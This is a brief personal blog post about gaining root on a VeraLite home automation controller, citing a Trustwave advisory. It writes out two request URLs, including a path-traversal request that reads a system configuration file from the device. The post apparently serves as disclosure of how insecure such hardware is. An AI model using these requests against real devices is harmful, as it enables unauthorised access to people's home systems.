Home automation hardware are some of the worst products security wise.
Today I wanted to log into my veralite, but I forgot the root password.
In no more than 30 minutes, I found a way to gain root.
Source: https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-019.txt
First go here
http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test
Then go here
http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/cmh/cmh.conf
Then cry, because I just realized my home devices are open to anyone…